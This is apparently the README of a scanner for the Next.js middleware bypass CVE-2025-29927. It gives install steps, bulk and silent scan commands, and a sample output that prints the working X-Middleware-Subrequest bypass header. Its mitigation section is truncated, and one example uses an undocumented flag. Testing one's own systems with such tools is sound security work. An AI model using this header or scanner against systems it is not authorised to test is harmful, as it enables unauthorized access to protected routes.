CVE-2025-29927 是一款专门用于检测 Next.js 中间件绕过漏洞 (CVE-2025-29927) 的安全工具,该漏洞影响 Next.js 版本 11.1.4 至 15.2.2。这一严重漏洞允许攻击者通过发送特制的 HTTP 头来绕过安全控制。
Next.js 中间件绕过漏洞 (CVE-2025-29927) 允许攻击者通过发送恶意 X-Middleware-Subrequest 头来绕过授权控制,该头会混淆中间件处理逻辑。这可能导致对受保护资源和路由的未授权访问。
CVSS 评分: 9.1(严重)
# 克隆仓库
git clone https://github.com/gotr00t0day/CVE-2025-29927.git
cd CVE-2025-29927
# 安装依赖
pip install -r requirements.txt
python CVE-2025-29927.py [-h] [-t TARGET] [-f FILE] [-c CONCURRENCY] [-k] [-s]
-t, --target:要扫描的单个目标(例如 example.com 或 https://example.com)-f, --file:包含目标列表的文件(每行一个)-c, --concurrency:并发扫描数(默认:5)-k, --insecure:禁用 SSL 证书验证(对 IP 地址有用)-s, --silent:静默模式 - 仅显示存在漏洞的目标扫描单个目标:
python CVE-2025-29927.py -t example.com
从文件扫描多个目标:
python CVE-2025-29927.py -f targets.txt
禁用 SSL 验证的扫描:
python CVE-2025-29927.py -t 192.168.1.1 -k
使用静默模式的自动化扫描:
python CVE-2025-29927.py -f targets.txt -k -s
使用自定义头进行扫描:
python3 CVE-2025-29927.py -t target -k -s -H "middleware"
对于存在漏洞的目标,MiddleWay 会显示:
输出示例:
[VULNERABLE] https://example.com - Endpoint /admin can be bypassed
Original status: 401
Bypassed status: 200
Bypass header: X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
要缓解此漏洞,请:
X-Middleware-Subrequest 头此工具仅用于安全研究和防御目的。在扫描任何非您拥有的系统之前,请务必获得适当授权。作者不对任何误用此工具的行为负责。
MIT